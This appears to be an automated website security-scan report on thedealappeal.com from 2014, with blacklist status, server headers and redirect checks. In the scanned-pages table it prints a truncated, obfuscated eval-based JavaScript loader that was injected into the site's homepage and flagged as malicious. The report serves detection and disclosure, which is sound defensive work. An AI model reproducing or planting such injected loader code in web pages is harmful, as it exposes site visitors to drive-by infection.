Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thedealappeal.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thedealappeal.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 05 Jul 2014 11:20:15 GMT Pragma: no-cache Location: http://www.thedealappeal.com/ Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: __utmfr=833; expires=Sat, 12-Jul-2014 11:20:15 GMT; path=/ Set-Cookie: PHPSESSID=9kerjd68qgvnjt3kekemfp16t4; path=/ X-Pingback: http://www.thedealappeal.com/xmlrpc.php | clean |
http://www.thedealappeal.com/ | 200 OK Content-Length: 2651 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=18;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,3 z=s;e(s);}} Antivirus reports:
| ||
http://www.thedealappeal.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thedealappeal.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 05 Jul 2014 11:20:15 GMT
Pragma: no-cache
Location: http://www.thedealappeal.com/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: __utmfr=833; expires=Sat, 12-Jul-2014 11:20:15 GMT; path=/
Set-Cookie: PHPSESSID=9kerjd68qgvnjt3kekemfp16t4; path=/
X-Pingback: http://www.thedealappeal.com/xmlrpc.php
GET / HTTP/1.1
Host: thedealappeal.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 05 Jul 2014 11:20:15 GMT
Pragma: no-cache
Location: http://www.thedealappeal.com/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: __utmfr=833; expires=Sat, 12-Jul-2014 11:20:15 GMT; path=/
Set-Cookie: PHPSESSID=9kerjd68qgvnjt3kekemfp16t4; path=/
X-Pingback: http://www.thedealappeal.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: thedealappeal.com
Referer: http://www.google.com/search?q=thedealappeal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thedealappeal.com
Referer: http://www.google.com/search?q=thedealappeal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.